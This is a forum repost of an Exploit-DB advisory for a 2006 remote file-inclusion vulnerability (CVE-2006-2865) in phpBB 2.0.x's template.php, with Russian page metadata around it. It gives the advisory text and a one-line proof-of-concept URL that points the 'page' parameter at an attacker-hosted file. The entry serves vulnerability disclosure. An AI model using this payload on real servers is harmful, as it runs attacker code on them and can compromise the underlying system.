Exploit phpBB 2.0.x - 'template.php' Remote File Inclusion

Exploiter

Хакер
34,599
0
18 Дек 2022
EDB-ID
27961
Проверка EDB
  1. Пройдено
Автор
CANBERX
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
cve-2006-2865
Дата публикации
2006-06-02
Код:
source: https://www.securityfocus.com/bid/18255/info

The phpBB application is prone to a remote file-include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input.

An attacker can exploit this issue to include an arbitrary remote file containing malicious PHP code and execute it in the context of the webserver process. This may allow the attacker to compromise the application and the underlying system; other attacks are also possible.

http://www.example.com/[path_to_phpbb]/template.php?page=[attacker]
 
Источник
www.exploit-db.com

Похожие темы